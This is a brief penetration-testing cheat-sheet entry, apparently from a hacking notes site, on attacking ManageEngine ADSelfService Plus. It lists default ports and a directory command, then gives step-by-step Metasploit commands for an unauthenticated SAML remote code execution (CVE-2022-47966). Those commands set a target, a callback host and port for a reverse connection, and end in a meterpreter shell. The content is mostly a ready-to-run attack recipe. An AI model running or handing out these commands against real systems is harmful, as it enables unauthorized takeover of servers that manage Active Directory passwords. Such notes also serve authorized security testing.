ManageEngine ADSelfService Plus PrivEsc

Last modified: 2023-04-16

Privilege Escalation Windows

ADSelfService Plus is an integrated Active Directory Self-Service Password Management and Single Sign-on Solution that reduces password-related help desk calls. Default ports are 8888 (http) and 9251 (https).


dir -Force \Program Files (x86)\ManageEngine\ADSelfService Plus\

Unauthenticated SAML RCE (CVE-2022-47966)


msf> use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
msf> set GUID 43ae36f51da65753530a64b37a510a53
msf> set ISSUER_URL
msf> set RHOSTS <target-ip>
msf> set RPORT 9251
msf> set LHOST <local-ip>
msf> set LPORT 4444
msf> run
meterpreter> shell